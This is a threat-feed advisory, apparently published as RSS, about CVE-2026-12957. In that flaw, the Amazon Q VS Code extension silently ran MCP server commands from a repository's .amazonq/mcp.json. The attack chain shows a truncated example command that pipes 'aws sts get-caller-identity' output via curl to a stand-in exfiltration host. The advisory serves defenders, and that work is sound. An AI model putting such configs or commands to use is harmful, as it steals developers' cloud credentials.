<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>Visual Studio Toolkit for Amazon Q (&lt; 1.94.0.0) - CraftedSignal Threat Feed</title><link>https://feed.craftedsignal.io/products/visual-studio-toolkit-for-amazon-q--1.94.0.0/</link><description>Trending threats, MITRE ATT&amp;CK coverage, and detection metadata. Fed continuously.</description><generator>Hugo</generator><language>en</language><managingEditor>hello@craftedsignal.io</managingEditor><webMaster>hello@craftedsignal.io</webMaster><lastBuildDate>Fri, 26 Jun 2026 12:13:02 +0000</lastBuildDate><atom:link href="https://feed.craftedsignal.io/products/visual-studio-toolkit-for-amazon-q--1.94.0.0/feed.xml" rel="self" type="application/rss+xml"/><item><title>CVE-2026-12957: Amazon Q VS Code Extension Arbitrary Code Execution</title><link>https://feed.craftedsignal.io/briefs/2026-06-amazon-q-rce/</link><pubDate>Fri, 26 Jun 2026 12:13:02 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-06-amazon-q-rce/</guid><description>A high-severity vulnerability (CVE-2026-12957) in the Amazon Q Developer Extension for Visual Studio Code allowed attackers to achieve arbitrary code execution and cloud credential theft by automatically loading and executing malicious Model Context Protocol (MCP) server configurations from a `.amazonq/mcp.json` file in a repository without user consent, providing full access to a developer's environment and cloud credentials.</description><content:encoded><![CDATA[<p>Wiz Research discovered a high-severity vulnerability, CVE-2026-12957, in the Amazon Q Developer Extension for Visual Studio Code, impacting language server versions prior to 1.65.0. This flaw allowed for arbitrary code execution and cloud credential theft. When a developer opened a malicious repository containing a specially crafted <code>.amazonq/mcp.json</code> file, Amazon Q would automatically load and execute Model Context Protocol (MCP) server configurations defined within this file. Critically, this execution occurred without user consent, workspace trust checks, or any visible indicators, and the spawned processes inherited the developer's full environment, including sensitive AWS credentials, API keys, and SSH agent sockets. This vulnerability, which demonstrates a broader pattern affecting AI coding tools, has since been remediated by Amazon in language server version 1.65.0, which now implements a consent prompt.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker crafts a malicious repository containing a <code>.amazonq/mcp.json</code> file that defines an MCP server with a malicious command (e.g., <code>bash -c &quot;aws sts get-caller-identity | curl...&quot;</code>).</li>
<li>The attacker induces a developer to clone the malicious repository, potentially through social engineering, typosquatting, or malicious pull requests.</li>
<li>The developer opens the cloned repository in VS Code, with the Amazon Q Developer Extension installed and active.</li>
<li>Amazon Q automatically loads and executes the malicious MCP server configuration from the <code>.amazonq/mcp.json</code> file located in the workspace root without prompting the user for consent.</li>
<li>The malicious command executes on the developer's machine, inheriting their complete environment, including sensitive AWS credentials (e.g., <code>AWS_ACCESS_KEY_ID</code>, <code>AWS_SECRET_ACCESS_KEY</code>).</li>
<li>The output of the command, containing the developer's active AWS session information (e.g., from <code>aws sts get-caller-identity</code>), is exfiltrated to the attacker's controlled endpoint (e.g., <code>exfil.attacker.test</code>) via <code>curl</code>.</li>
<li>The attacker uses the stolen AWS credentials to gain unauthorized access, establish persistence, or perform lateral movement within the developer's associated cloud environment.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>The successful exploitation of CVE-2026-12957 results in immediate arbitrary code execution on the victim's machine with minimal user interaction, often occurring silently without visible indicators. This leads to the theft of cloud credentials (AWS, GCP, Azure), API keys, and other secrets, enabling attackers to establish cloud persistence by backdooring IAM users or infrastructure. The attacker can then perform supply chain attacks targeting maintainers of popular projects or conduct lateral movement into production systems if the developer has sufficient access. This vulnerability facilitates critical compromise of development environments and cloud resources, posing a significant risk to an organization's software supply chain and infrastructure.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Immediately upgrade the Amazon Q Developer Extension for Visual Studio Code to language server version 1.65.0 or later to patch CVE-2026-12957.</li>
<li>Educate developers to be cautious with untrusted repositories and review MCP consent prompts carefully when displayed by Amazon Q.</li>
<li>Deploy the Sigma rule provided in this brief to your SIEM to detect suspicious credential exfiltration attempts.</li>
<li>Monitor for the creation or modification of <code>.amazonq/mcp.json</code> files in development repositories, particularly in untrusted contexts.</li>
<li>Block the C2 domain <code>exfil.attacker.test</code> listed in the IOC table at the DNS resolver and network perimeter.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>vulnerability</category><category>code-editor</category><category>cloud</category><category>rce</category><category>vs-code</category><category>supply-chain</category></item></channel></rss>